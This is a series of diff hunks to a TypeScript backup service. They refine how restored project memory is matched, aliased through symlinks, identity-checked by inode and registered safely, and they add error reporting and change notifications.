+            `Cannot import '${candidate.name}': '${resolved}' already receives a backed-up project's memory in this restore`
+          );
+        }
+        // Nor a directory at another backed-up project's recorded path: registering it would
+        // make every later restore match that other entry there directly, by exact path — over
+        // an origin record and ahead of anywhere its memory was imported — so the other entry's
+        // notes would be written into this candidate's scope. Its own recorded path is fine:
+        // that is the entry being restored where it came from.
+        for (const spelling of new Set([resolved, canonical, registeredPath ?? resolved])) {
+          if (recordedSources.has(spelling) && spelling !== candidate.sourcePath) {
+            throw new BackupServiceError(
+              "IO_ERROR",
+              `Cannot import '${candidate.name}': '${resolved}' is the recorded path of another backed-up project`
+            );
+          }
+        }
+        return {
+          candidate,
+          targetPath: resolved,
+          target,
+          registeredPath,
+          sourceRegisteredAtPlanning: registry.keys.has(candidate.sourcePath),
+        };
+      } catch (error) {
+        await target.close().catch(() => undefined);
+        throw error;
       }
-      planned.push({
-        candidate,
-        targetPath: resolved,
-        // The directory itself, not just its name: execution refuses a different directory
-        // that has since taken this path (the checkout moved away, another created here).
-        targetIdentity: { dev: stat.dev, ino: stat.ino },
-        registeredPath,
-        sourceRegisteredAtPlanning: registry.keys.has(candidate.sourcePath),
-      });
     }
-    return { imports: planned, registry };
   }
 
   /**
@@ -974,7 +1037,7 @@ export class BackupService {
       for (const {
         candidate,
         targetPath,
-        targetIdentity,
+        target,
         registeredPath: plannedRegisteredPath,
         sourceRegisteredAtPlanning,
       } of planned) {
@@ -1036,12 +1099,13 @@ export class BackupService {
           }
           // The same directory the user approved, not merely one at the same path: a checkout
           // moved away and another created here since would otherwise be registered and
-          // receive the approved source's memory. Checked again after create() below, which
+          // receive the approved source's memory. Compared against the handle planning has
+          // kept open, whose inode a replacement cannot have been given (see
+          // PlannedProjectImport.target). Checked again after create() below, which
           // re-resolves the path itself during its own asynchronous validation.
+          const approved = await target.stat();
           const replaced = (current: { dev: number; ino: number } | null): boolean =>
-            current === null ||
-            current.dev !== targetIdentity.dev ||
-            current.ino !== targetIdentity.ino;
+            current === null || current.dev !== approved.dev || current.ino !== approved.ino;
           if (replaced(stat)) {
             results.push(
               failed(`'${targetPath}' was replaced by a different directory since it was approved`)

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -90,8 +90,11 @@ export interface BackupPayloadStore {
   }): Promise<{
     hasProjectBundle: boolean;
     projectImports: BackupProjectImport[];
-    /** Bundle entries classified as matched; restore writes only these, never a newer match. */
-    matchedProjectPaths: string[];
+    /**
+     * Bundle entries classified as matched, with the local destination each one resolved
+     * to; restore writes only these exact pairs, never a newer or different match.
+     */
+    matchedProjects: BackupMatchedProject[];
   }>;
   /** Core settings only; matched project memory is snapshotted by `restore` under its lock. */
   writeSafetySnapshot(snapshotRoot: string): Promise<void>;
@@ -102,7 +105,7 @@ export interface BackupPayloadStore {
     includeProjects: boolean;
     /** Receives the matched project memory snapshot, taken in the write's lock window. */
     snapshotPath: string;
-    matchedProjectPaths: readonly string[];
+    matchedProjects: readonly BackupMatchedProject[];
   }): Promise<{
     changedFiles: string[];
     localOnlyFiles: string[];
@@ -119,6 +122,13 @@ export interface BackupPayloadStore {
     repositoryRoot: string;
     managedPath: string;
   }): Promise<BackupProjectImporter>;
+}
+
+/** A validated matched entry: the recorded source and the local project it restores into. */
+export interface BackupMatchedProject {
+  sourcePath: string;
+  projectPath: string;
+  localMemoryDir: string;
 }
 
 export interface BackupProjectImporter {
@@ -647,7 +657,7 @@ export class BackupService {
             approvedCommandTokens,
             includeProjects,
             snapshotPath,
-            matchedProjectPaths: validated.matchedProjectPaths,
+            matchedProjects: validated.matchedProjects,
           });
           // Announced as soon as the memory is on disk: a failure recording the commit below
           // must not leave subscribers showing pre-restore contents.

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -813,10 +813,16 @@ export class BackupService {
     // with this restore, so the registry may have changed in between. A target unregistered
     // since must be registered again, not written into on its stale identity; one registered
     // meanwhile — possibly through a different symlinked spelling of the same directory,
-    // which create()'s own duplicate check does not resolve — must import into that
-    // registration instead of adding a second one and splitting the project identity.
+    // which create()'s own duplicate check does not resolve — must not be registered a
+    // second time, which would split the project identity.
     const registry = await this.registeredProjectLookup();
-    for (const { candidate, targetPath } of planned) {
+    for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
+      // The identity the preflight checked (memory limits, non-file destinations,
+      // permissions) is the only one this import may write to. A different identity now —
+      // the checkout registered under another alias since planning — names a memory scope
+      // nothing has checked, so the candidate fails without a write and stays on offer;
+      // the next preview resolves the new registration and preflights it.
+      const preflightedPath = plannedRegisteredPath ?? targetPath;
       // Once registration resolves the project identity, failures report that path: it is
       // where any partially written memory actually lives.
       let registeredPath: string | null = null;
@@ -832,6 +838,10 @@ export class BackupService {
         writtenFiles: progress.written,
         skippedFiles: progress.skipped,
       });
+      const unchecked = (registered: string): BackupProjectImportResult =>
+        failed(
+          `'${targetPath}' is now registered as '${registered}', which this import was not checked against; approve it again`
+        );
       try {
         if (this.projectRegistrar === null) {
           results.push(failed("Project registration is unavailable"));
@@ -852,6 +862,11 @@ export class BackupService {
           await realpathOrNull(targetPath),
           registry
         );
+        // Checked before create() so a refused candidate leaves no registration behind.
+        if ((registeredIdentity ?? targetPath) !== preflightedPath) {
+          results.push(unchecked(registeredIdentity ?? targetPath));
+          continue;
+        }
         // The backed-up name travels with a newly registered project (in the same config
         // write as the registration); an already registered target keeps its local name.
         const created =
@@ -877,6 +892,10 @@ export class BackupService {
             );
           if (registeredPath === null) {
             results.push(failed(`'${targetPath}' is already registered under a different path`));
+            continue;
+          }
+          if (registeredPath !== preflightedPath) {
+            results.push(unchecked(registeredPath));
             continue;
           }
         } else {

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -155,6 +155,13 @@ export interface BackupMemoryNotifier {
   notifyExternalProjectChange(projectPath: string): void;
 }
 
+/** One approved import after planning: its resolved target and, if already registered, its identity. */
+interface PlannedProjectImport {
+  candidate: BackupProjectImport;
+  targetPath: string;
+  registeredPath: string | null;
+}
+
 export interface BackupServiceDependencies {
   gitRepo: BackupGitRepo;
   payload: BackupPayloadStore;
@@ -600,7 +607,9 @@ export class BackupService {
         for (const planned of plannedImports) {
           await importer?.assertProjectMemoryAllowed({
             token: planned.candidate.token,
-            targetPath: planned.targetPath,
+            // Against the identity the import will actually write to: a target that is an
+            // alias of an already registered project imports into that project.
+            targetPath: planned.registeredPath ?? planned.targetPath,
           });
         }
         const plannedTokens = new Set(plannedImports.map((planned) => planned.candidate.token));
@@ -635,6 +644,13 @@ export class BackupService {
           const projectImportResults =
             importer === null ? [] : await this.executeProjectImports(importer, plannedImports);
           this.notifyProjectMemoryChanges([], projectImportResults);
+          // A candidate whose import failed per-candidate stays on offer so the user can fix
+          // the target and retry without another preview; its token is still current.
+          const failedTokens = new Set(
+            projectImportResults.flatMap((result, index) =>
+              result.status === "failed" ? [plannedImports[index]?.candidate.token] : []
+            )
+          );
           return Ok({
             commit: remoteCommit,
             snapshotPath,
@@ -642,7 +658,10 @@ export class BackupService {
             localOnlyFiles: restored.localOnlyFiles,
             projectImportResults,
             projectBundleSkipped: restored.projectBundleSkipped,
-            unapprovedProjectImports,
+            unapprovedProjectImports: [
+              ...unapprovedProjectImports,
+              ...validated.projectImports.filter((candidate) => failedTokens.has(candidate.token)),
+            ],
           });
         } catch (error) {
           // Memory the failed restore already overwrote is on disk; subscribers must
@@ -674,7 +693,7 @@ export class BackupService {
     requested: ReadonlyArray<{ token: string; targetPath: string }>,
     candidates: readonly BackupProjectImport[],
     includeProjects: boolean
-  ): Promise<Array<{ candidate: BackupProjectImport; targetPath: string }>> {
+  ): Promise<PlannedProjectImport[]> {
     if (requested.length === 0) return [];
     if (!includeProjects) {
       throw new BackupServiceError(
@@ -683,7 +702,7 @@ export class BackupService {
       );
     }
     const byToken = new Map(candidates.map((candidate) => [candidate.token, candidate]));
-    const planned: Array<{ candidate: BackupProjectImport; targetPath: string }> = [];
+    const planned: PlannedProjectImport[] = [];
     const claimedTargets = new Set<string>();
     for (const request of requested) {
       const candidate = byToken.get(request.token);
@@ -721,7 +740,13 @@ export class BackupService {
         );
       }
       claimedTargets.add(canonical);
-      planned.push({ candidate, targetPath: resolved });
+      planned.push({
+        candidate,
+        targetPath: resolved,
+        // Known up front when the target is already registered (directly or as an alias),
+        // so the preflight checks the memory scope the import will really write to.
+        registeredPath: this.resolveRegisteredProjectPath(resolved, canonical),
+      });
     }
     return planned;
   }
@@ -735,7 +760,7 @@ export class BackupService {
    */
   private async executeProjectImports(
     importer: BackupProjectImporter,
-    planned: ReadonlyArray<{ candidate: BackupProjectImport; targetPath: string }>
+    planned: readonly PlannedProjectImport[]
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
     for (const { candidate, targetPath } of planned) {

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -222,6 +222,13 @@ interface PlannedProjectImport {
   targetPath: string;
   targetIdentity: { dev: number; ino: number };
   registeredPath: string | null;
+  /**
+   * Whether the candidate's recorded source path was already registered when it was offered.
+   * It can be: an entry registered here whose recorded memory directory name is not the one
+   * this host computes (a path from another OS) is offered as an import on purpose, and
+   * stays importable. Only a registration that appears after planning reclassifies it.
+   */
+  sourceRegisteredAtPlanning: boolean;
 }
 
 /** planProjectImports' result: the imports and the registry lookup they were resolved against. */
@@ -358,24 +365,32 @@ async function realpathOrNull(target: string): Promise<string | null> {
 }
 
 /**
- * `realpathOrNull` bounded by `timeoutMs`; `stalled` when the time ran out first. A
- * resolution still blocked on an unavailable mount then finishes on its own in the
- * threadpool; nothing waits for it (see REGISTRY_MAX_STALLED_PROBES).
+ * A registered path's real path, bounded by `timeoutMs`. `unknown` when the probe says nothing
+ * about what the path is: the time ran out first (the resolution, still blocked on an
+ * unavailable mount, then finishes on its own in the threadpool; nothing waits for it — see
+ * REGISTRY_MAX_STALLED_PROBES), or it failed for a reason other than the path not existing
+ * (EACCES, EIO): such a path may still be another spelling of a reachable directory. Only a
+ * path that provably leads nowhere resolves to a known null.
  */
-async function realpathWithin(
+async function registeredRealpathWithin(
   target: string,
   timeoutMs: number
-): Promise<{ canonical: string | null; stalled: boolean }> {
-  if (timeoutMs <= 0) return { canonical: null, stalled: false };
+): Promise<{ canonical: string | null; unknown: boolean; stalled: boolean }> {
+  if (timeoutMs <= 0) return { canonical: null, unknown: true, stalled: false };
   let timer: ReturnType<typeof setTimeout> | undefined;
-  const expired = new Promise<{ canonical: null; stalled: true }>((resolve) => {
-    timer = setTimeout(() => resolve({ canonical: null, stalled: true }), timeoutMs);
+  const expired = new Promise<{ canonical: null; unknown: true; stalled: true }>((resolve) => {
+    timer = setTimeout(() => resolve({ canonical: null, unknown: true, stalled: true }), timeoutMs);
   });
+  const probe = fs.realpath(target).then(
+    (canonical) => ({ canonical, unknown: false, stalled: false }),
+    (error: NodeJS.ErrnoException) => ({
+      canonical: null,
+      unknown: error.code !== "ENOENT" && error.code !== "ENOTDIR",
+      stalled: false,
+    })
+  );
   try {
-    return await Promise.race([
-      realpathOrNull(target).then((canonical) => ({ canonical, stalled: false })),
-      expired,
-    ]);
+    return await Promise.race([probe, expired]);
   } finally {
     clearTimeout(timer);
   }
@@ -904,6 +919,7 @@ export class BackupService {
         // that has since taken this path (the checkout moved away, another created here).
         targetIdentity: { dev: stat.dev, ino: stat.ino },
         registeredPath,
+        sourceRegisteredAtPlanning: registry.keys.has(candidate.sourcePath),
       });
     }
     return { imports: planned, registry };
@@ -960,6 +976,7 @@ export class BackupService {
         targetPath,
         targetIdentity,
         registeredPath: plannedRegisteredPath,
+        sourceRegisteredAtPlanning,
       } of planned) {
         // The identity the preflight checked (memory limits, non-file destinations,
         // permissions) is the only one this import may write to. A different identity now —
@@ -991,13 +1008,17 @@ export class BackupService {
             `'${targetPath}' is now registered as '${registered}', which this import was not checked against; approve it again`
           );
         try {
-          // Reclassified since validation: the candidate's recorded source path is registered
-          // on this machine now, so every later restore writes the entry directly into that
-          // project — memory imported into the approved target would be orphaned there and
-          // its origin record overridden by the exact-path match. Refused under the
-          // registration lock, where this cannot change again before the write; the next
-          // preview shows the entry as matched.
-          if (registry.keys.has(candidate.sourcePath) || registeredHere.has(candidate.sourcePath)) {
+          // Reclassified since validation: the candidate's recorded source path was registered
+          // on this machine after it was offered, so the next restore may write the entry
+          // directly into that project — memory imported into the approved target would be
+          // orphaned there and its origin record overridden by the exact-path match. Refused
+          // under the registration lock, where this cannot change again before the write; the
+          // next preview shows the entry as matched, or offers it again if it still cannot
+          // be (see sourceRegisteredAtPlanning).
+          if (
+            !sourceRegisteredAtPlanning &&
+            (registry.keys.has(candidate.sourcePath) || registeredHere.has(candidate.sourcePath))
+          ) {
             reclassified.add(candidate.token);
             results.push(
               failed(
@@ -1205,16 +1226,9 @@ export class BackupService {
               ? Math.ceil((deadline - Date.now()) / unprobed)
               : 0;
           unprobed -= 1;
-          if (budget <= 0) {
-            unresolved.add(key);
-            canonicalByKey.set(key, null);
-            return;
-          }
-          const probe = await realpathWithin(key, budget);
-          if (probe.stalled) {
-            stalled += 1;
-            unresolved.add(key);
-          }
+          const probe = await registeredRealpathWithin(key, budget);
+          if (probe.stalled) stalled += 1;
+          if (probe.unknown) unresolved.add(key);
           canonicalByKey.set(key, probe.canonical);
         } finally {
           slot.release();

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -28,6 +28,8 @@ import {
 import {
   BackupCommandApprovalRequiredError,
   BackupProjectImportApprovalRequiredError,
+  ProjectMemoryWriteError,
+  projectMemoryRelPath,
 } from "./payload";
 
 export interface PreparedBackupRepository {
@@ -84,17 +86,29 @@ export interface BackupPayloadStore {
     managedPath: string;
     approvedCommandTokens?: readonly string[];
     includeProjects: boolean;
-  }): Promise<{ hasProjectBundle: boolean; projectImports: BackupProjectImport[] }>;
-  writeSafetySnapshot(
-    snapshotRoot: string,
-    options: { includeProjectMemory: boolean }
-  ): Promise<void>;
+  }): Promise<{
+    hasProjectBundle: boolean;
+    projectImports: BackupProjectImport[];
+    /** Bundle entries classified as matched; restore writes only these, never a newer match. */
+    matchedProjectPaths: string[];
+  }>;
+  /** Core settings only; matched project memory is snapshotted by `restore` under its lock. */
+  writeSafetySnapshot(snapshotRoot: string): Promise<void>;
   restore(options: {
     repositoryRoot: string;
     managedPath: string;
     approvedCommandTokens?: readonly string[];
     includeProjects: boolean;
-  }): Promise<{ changedFiles: string[]; localOnlyFiles: string[]; projectBundleSkipped: boolean }>;
+    /** Receives the matched project memory snapshot, taken in the write's lock window. */
+    snapshotPath: string;
+    matchedProjectPaths: readonly string[];
+  }): Promise<{
+    changedFiles: string[];
+    localOnlyFiles: string[];
+    projectBundleSkipped: boolean;
+    /** Matched memory actually written, per registered project, for change notification. */
+    restoredProjectMemory: Array<{ projectPath: string; files: string[] }>;
+  }>;
   /**
    * Writes one approved import's memory files, re-keyed to the target path's locally
    * computed directory, add-only. Runs after the project was registered so no path ever
@@ -114,6 +128,15 @@ export interface BackupPayloadStore {
  */
 export interface BackupProjectRegistrar {
   create(projectPath: string): Promise<Result<{ normalizedPath: string }, string>>;
+}
+
+/**
+ * The slice of MemoryService a restore needs to announce the project memory it wrote
+ * directly. Memory subscribers refresh from disk only on change events, so a silent
+ * external writer would leave an open memory browser showing pre-restore contents.
+ */
+export interface BackupMemoryNotifier {
+  notifyExternalProjectChange(projectPath: string, relPaths: readonly string[]): void;
 }
 
 export interface BackupServiceDependencies {
@@ -219,6 +242,10 @@ function toOperationError(error: unknown): BackupOperationError {
   return { code: "IO_ERROR", message: "Settings backup failed" };
 }
 
+async function realpathOrNull(target: string): Promise<string | null> {
+  return fs.realpath(target).catch(() => null);
+}
+
 function repoLockKey(settings: SettingsBackupInput): string {
   return `${settings.repoUrl}\0${settings.branch}`;
 }
@@ -302,6 +329,7 @@ export class BackupService {
 
   /** Absent until the container wires ProjectService; imports fail per candidate without it. */
   private projectRegistrar: BackupProjectRegistrar | null = null;
+  private memoryNotifier: BackupMemoryNotifier | null = null;
 
   constructor(
     private readonly config: Config,
@@ -310,6 +338,10 @@ export class BackupService {
 
   setProjectService(projectRegistrar: BackupProjectRegistrar): void {
     this.projectRegistrar = projectRegistrar;
+  }
+
+  setMemoryNotifier(memoryNotifier: BackupMemoryNotifier): void {
+    this.memoryNotifier = memoryNotifier;
   }
 
   getSettings(): SettingsBackup | null {
@@ -508,9 +540,7 @@ export class BackupService {
         );
         const snapshotPath = await this.createSnapshotPath();
         try {
-          await this.dependencies.payload.writeSafetySnapshot(snapshotPath, {
-            includeProjectMemory: includeProjects && validated.hasProjectBundle,
-          });
+          await this.dependencies.payload.writeSafetySnapshot(snapshotPath);
         } catch (error) {
           // Nothing has been restored yet, so a snapshot that did not finish is an empty or
           // partial unredacted copy that no recovery can use, and every retry would add one.
@@ -523,8 +553,11 @@ export class BackupService {
             managedPath: repository.managedPath,
             approvedCommandTokens,
             includeProjects,
+            snapshotPath,
+            matchedProjectPaths: validated.matchedProjectPaths,
           });
           const projectImportResults = await this.executeProjectImports(repository, plannedImports);
+          this.notifyProjectMemoryChanges(restored.restoredProjectMemory, projectImportResults);
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           return Ok({
             commit: remoteCommit,
@@ -620,14 +653,20 @@ export class BackupService {
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
     for (const { candidate, targetPath } of planned) {
-      const failed = (message: string): BackupProjectImportResult => ({
+      // Once registration resolves the project identity, failures report that path: it is
+      // where any partially written memory actually lives.
+      let registeredPath: string | null = null;
+      const failed = (
+        message: string,
+        progress: { written: string[]; skipped: string[] } = { written: [], skipped: [] }
+      ): BackupProjectImportResult => ({
         sourcePath: candidate.sourcePath,
-        targetPath,
+        targetPath: registeredPath ?? targetPath,
         name: candidate.name,
         status: "failed",
         message,
-        writtenFiles: [],
-        skippedFiles: [],
+        writtenFiles: progress.written,
+        skippedFiles: progress.skipped,
       });
       try {
         if (this.projectRegistrar === null) {
@@ -642,13 +681,17 @@ export class BackupService {
           continue;
         }
         const created = await this.projectRegistrar.create(targetPath);
-        let registeredPath: string;
         if (created.success) {
           registeredPath = created.data.normalizedPath;
         } else if (created.error === "Project already exists") {
-          // Already registered at exactly this path is the idempotent case: the import
-          // then only adds the memory files.
-          registeredPath = path.resolve(targetPath);
+          registeredPath = this.resolveRegisteredProjectPath(
+            targetPath,
+            await realpathOrNull(targetPath)
+          );
+          if (registeredPath === null) {
+            results.push(failed(`'${targetPath}' is already registered under a different path`));
+            continue;
+          }
         } else {
           results.push(failed(created.error));
           continue;
@@ -668,10 +711,49 @@ export class BackupService {
           skippedFiles: written.skippedFiles,
         });
       } catch (error) {
-        results.push(failed(error instanceof Error ? error.message : String(error)));
+        // A write that failed midway already created files; the result must list them or
+        // the user has nothing to clean up by.
+        results.push(
+          error instanceof ProjectMemoryWriteError
+            ? failed(error.message, error)
+            : failed(error instanceof Error ? error.message : String(error))
+        );
       }
     }
     return results;
+  }
+
+  /**
+   * `ProjectService.create` reports "already exists" both for the exact registered path
+   * and for a target that only reaches a registered project through a symlinked parent.
+   * Memory is keyed by the registered path's hash, so an alias must import to the
+   * registered identity — writing under the alias would land files the project never
+   * reads while reporting them as imported. Null when neither spelling is registered.
+   */
+  private resolveRegisteredProjectPath(targetPath: string, canonicalPath: string | null) {
+    const projects = this.config.loadConfigOrDefault().projects;
+    const resolved = path.resolve(targetPath);
+    if (projects.has(resolved)) return resolved;
+    if (canonicalPath !== null && projects.has(canonicalPath)) return canonicalPath;
+    return null;
+  }
+
+  private notifyProjectMemoryChanges(
+    restoredProjectMemory: ReadonlyArray<{ projectPath: string; files: string[] }>,
+    importResults: readonly BackupProjectImportResult[]
+  ): void {
+    if (this.memoryNotifier === null) return;
+    for (const { projectPath, files } of restoredProjectMemory) {
+      this.memoryNotifier.notifyExternalProjectChange(projectPath, files.map(projectMemoryRelPath));
+    }
+    // Failed imports included: their partial writes are on disk too.
+    for (const result of importResults) {
+      if (result.writtenFiles.length === 0) continue;
+      this.memoryNotifier.notifyExternalProjectChange(
+        result.targetPath,
+        result.writtenFiles.map(projectMemoryRelPath)
+      );
+    }
   }
 
   private async prepareRepository(
@@ -725,14 +807,18 @@ export class BackupService {
         previous?.repoUrl === settings.repoUrl &&
         previous.branch === settings.branch &&
         previous.path === settings.path;
+      const isCommitUpdate = Object.keys(commitUpdate).length > 0;
       // Commit metadata must not rewrite the repository settings tuple. Another window can
       // save a different repository while a push or restore is in flight.
-      if (previous !== undefined && !sameRepository && Object.keys(commitUpdate).length > 0) {
+      if (previous !== undefined && !sameRepository && isCommitUpdate) {
         saved = previous;
         return current;
       }
       saved = {
-        ...settings,
+        // Recording a commit re-applies on top of the settings currently saved, not the
+        // ones the operation started with: same repository, but another window may have
+        // toggled includeProjects meanwhile, and that save must survive.
+        ...(sameRepository && isCommitUpdate ? previous : settings),
         ...(sameRepository
           ? {
               lastPushedCommit: previous.lastPushedCommit,

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -144,8 +144,10 @@ export interface BackupProjectImporter {
  * setter because the container constructs BackupService before ProjectService.
  */
 export interface BackupProjectRegistrar {
-  create(projectPath: string): Promise<Result<{ normalizedPath: string }, string>>;
-  setDisplayName(projectPath: string, displayName: string): Promise<void>;
+  create(
+    projectPath: string,
+    options?: { displayName?: string }
+  ): Promise<Result<{ normalizedPath: string }, string>>;
 }
 
 /**
@@ -803,17 +805,19 @@ export class BackupService {
         // An alias of an already registered project (resolved during planning) imports into
         // that project without a second registration; create() would otherwise register the
         // alias as a duplicate when its own duplicate check misses the aliased key.
+        // The backed-up name travels with a newly registered project (in the same config
+        // write as the registration); an already registered target keeps its local name.
         const created =
           plannedRegisteredPath === null
-            ? await this.projectRegistrar.create(targetPath)
+            ? await this.projectRegistrar.create(
+                targetPath,
+                candidate.name === getProjectDisplayName(targetPath)
+                  ? undefined
+                  : { displayName: candidate.name }
+              )
             : Err("Project already exists");
         if (created.success) {
           registeredPath = created.data.normalizedPath;
-          // The backed-up name travels with a newly registered project; an already
-          // registered target keeps its local name.
-          if (candidate.name !== getProjectDisplayName(registeredPath)) {
-            await this.projectRegistrar.setDisplayName(registeredPath, candidate.name);
-          }
         } else if (created.error === "Project already exists") {
           // Registered since planning (a concurrent registration): resolve against a fresh
           // lookup, since the planning-time one predates it.

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -799,6 +799,8 @@ export class BackupService {
     const claimedTargets = new Set<string>();
     const registry = await this.registeredProjectLookup();
     const matchedProjectPaths = new Set(matched.map((match) => match.projectPath));
+    // Every source path the bundle records, whichever entry recorded it.
+    const recordedSources = new Set([...candidates, ...matched].map((entry) => entry.sourcePath));
     for (const request of requested) {
       const candidate = byToken.get(request.token);
       // Unknown and stale tokens are indistinguishable here; both mean the user approved
@@ -866,6 +868,19 @@ export class BackupService {
           `Cannot import '${candidate.name}': '${resolved}' already receives a backed-up project's memory in this restore`
         );
       }
+      // Nor a directory at another backed-up project's recorded path: registering it would
+      // make every later restore match that other entry there directly, by exact path — over
+      // an origin record and ahead of anywhere its memory was imported — so the other entry's
+      // notes would be written into this candidate's scope. Its own recorded path is fine:
+      // that is the entry being restored where it came from.
+      for (const spelling of new Set([resolved, canonical, registeredPath ?? resolved])) {
+        if (recordedSources.has(spelling) && spelling !== candidate.sourcePath) {
+          throw new BackupServiceError(
+            "IO_ERROR",
+            `Cannot import '${candidate.name}': '${resolved}' is the recorded path of another backed-up project`
+          );
+        }
+      }
       planned.push({
         candidate,
         targetPath: resolved,
@@ -920,6 +935,10 @@ export class BackupService {
       // Real paths resolved during planning are reused; only projects registered since are
       // probed, so a slow mount is waited on once per restore, not again under this lock.
       const registry = await this.registeredProjectLookup(planningRegistry ?? undefined);
+      // Paths this very loop registers: the lookup above predates them, and a later
+      // candidate's recorded source may be one of them (planning refuses the case it can
+      // see; this is the check under the lock).
+      const registeredHere = new Set<string>();
       for (const {
         candidate,
         targetPath,
@@ -962,7 +981,7 @@ export class BackupService {
           // its origin record overridden by the exact-path match. Refused under the
           // registration lock, where this cannot change again before the write; the next
           // preview shows the entry as matched.
-          if (registry.keys.has(candidate.sourcePath)) {
+          if (registry.keys.has(candidate.sourcePath) || registeredHere.has(candidate.sourcePath)) {
             reclassified.add(candidate.token);
             results.push(
               failed(
@@ -1022,6 +1041,7 @@ export class BackupService {
           if (created.success) {
             registeredPath = created.data.normalizedPath;
             registered = true;
+            registeredHere.add(registeredPath);
           } else if (created.error === "Project already exists") {
             // Resolved above, or registered by an earlier candidate of this very loop (the
             // lock excludes everyone else): the lookup built inside the window predates that.

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -819,11 +819,19 @@ export class BackupService {
         }
         // An alias of an already registered project (resolved during planning) imports into
         // that project without a second registration; create() would otherwise register the
-        // alias as a duplicate when its own duplicate check misses the aliased key.
+        // alias as a duplicate when its own duplicate check misses the aliased key. The
+        // identity is re-read here because project registration is not serialized with this
+        // restore: a project unregistered meanwhile must be registered again, not written
+        // into as if it still existed.
+        const registeredIdentity =
+          plannedRegisteredPath !== null &&
+          this.config.loadConfigOrDefault().projects.has(plannedRegisteredPath)
+            ? plannedRegisteredPath
+            : null;
         // The backed-up name travels with a newly registered project (in the same config
         // write as the registration); an already registered target keeps its local name.
         const created =
-          plannedRegisteredPath === null
+          registeredIdentity === null
             ? await this.projectRegistrar.create(
                 targetPath,
                 candidate.name === getProjectDisplayName(targetPath)
@@ -837,7 +845,7 @@ export class BackupService {
           // Registered since planning (a concurrent registration): resolve against a fresh
           // lookup, since the planning-time one predates it.
           registeredPath =
-            plannedRegisteredPath ??
+            registeredIdentity ??
             this.resolveRegisteredProjectPath(
               targetPath,
               await realpathOrNull(targetPath),

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -723,21 +723,23 @@ export class BackupService {
           // does not cover, and their per-candidate results are the user's only undo list, so
           // nothing that can fail may run after them and discard those results.
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
-          const projectImportResults =
+          const { results: projectImportResults, reclassified } =
             importer === null
-              ? []
+              ? { results: [], reclassified: new Set<string>() }
               : await this.executeProjectImports(importer, plannedImports, registry);
           this.notifyProjectMemoryChanges([], projectImportResults);
           // A candidate whose import failed per-candidate, or landed only partly because
           // existing files conflicted, stays on offer so the user can fix the target or the
           // conflicts and retry without another preview; its token is still current, and a
           // conflicted import records no origin, so the source is still an import candidate.
+          // Not one whose source became a registered project here: only a new preview can
+          // present it, as a matched entry, so offering it again would only fail.
           const stillOfferedTokens = new Set(
-            projectImportResults.flatMap((result, index) =>
-              result.status === "failed" || result.skippedFiles.length > 0
-                ? [plannedImports[index]?.candidate.token]
-                : []
-            )
+            projectImportResults.flatMap((result, index) => {
+              const token = plannedImports[index]?.candidate.token;
+              if (token === undefined || reclassified.has(token)) return [];
+              return result.status === "failed" || result.skippedFiles.length > 0 ? [token] : [];
+            })
           );
           return Ok({
             commit: remoteCommit,
@@ -887,21 +889,26 @@ export class BackupService {
     importer: BackupProjectImporter,
     planned: readonly PlannedProjectImport[],
     planningRegistry: RegisteredProjectLookup | null
-  ): Promise<BackupProjectImportResult[]> {
+  ): Promise<{ results: BackupProjectImportResult[]; reclassified: Set<string> }> {
     const results: BackupProjectImportResult[] = [];
-    if (planned.length === 0) return results;
+    /** Tokens refused because their source is a registered project now; not retryable. */
+    const reclassified = new Set<string>();
+    if (planned.length === 0) return { results, reclassified };
     const registrar = this.projectRegistrar;
     if (registrar === null) {
-      return planned.map(({ candidate, targetPath }) => ({
-        sourcePath: candidate.sourcePath,
-        targetPath,
-        name: candidate.name,
-        status: "failed",
-        message: "Project registration is unavailable",
-        writtenFiles: [],
-        skippedFiles: [],
-        registered: false,
-      }));
+      return {
+        results: planned.map(({ candidate, targetPath }) => ({
+          sourcePath: candidate.sourcePath,
+          targetPath,
+          name: candidate.name,
+          status: "failed",
+          message: "Project registration is unavailable",
+          writtenFiles: [],
+          skippedFiles: [],
+          registered: false,
+        })),
+        reclassified,
+      };
     }
     // One registration window for the imports: registration is re-read inside it — so a
     // target unregistered since planning is registered again rather than written into on a
@@ -956,6 +963,7 @@ export class BackupService {
           // registration lock, where this cannot change again before the write; the next
           // preview shows the entry as matched.
           if (registry.keys.has(candidate.sourcePath)) {
+            reclassified.add(candidate.token);
             results.push(
               failed(
                 `'${candidate.sourcePath}' was registered on this machine since the preview and is now restored directly; preview again`
@@ -1072,7 +1080,7 @@ export class BackupService {
           );
         }
       }
-      return results;
+      return { results, reclassified };
     });
   }
 

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -617,6 +617,7 @@ export class BackupService {
         const plannedImports = await this.planProjectImports(
           requestedImports,
           validated.projectImports,
+          validated.matchedProjects,
           includeProjects
         );
         // The bundle is read once for every approved import, and each import's write-side
@@ -717,6 +718,7 @@ export class BackupService {
   private async planProjectImports(
     requested: ReadonlyArray<{ token: string; targetPath: string }>,
     candidates: readonly BackupProjectImport[],
+    matched: readonly BackupMatchedProject[],
     includeProjects: boolean
   ): Promise<PlannedProjectImport[]> {
     if (requested.length === 0) return [];
@@ -730,6 +732,7 @@ export class BackupService {
     const planned: PlannedProjectImport[] = [];
     const claimedTargets = new Set<string>();
     const registry = await this.registeredProjectLookup();
+    const matchedProjectPaths = new Set(matched.map((match) => match.projectPath));
     for (const request of requested) {
       const candidate = byToken.get(request.token);
       // Unknown and stale tokens are indistinguishable here; both mean the user approved
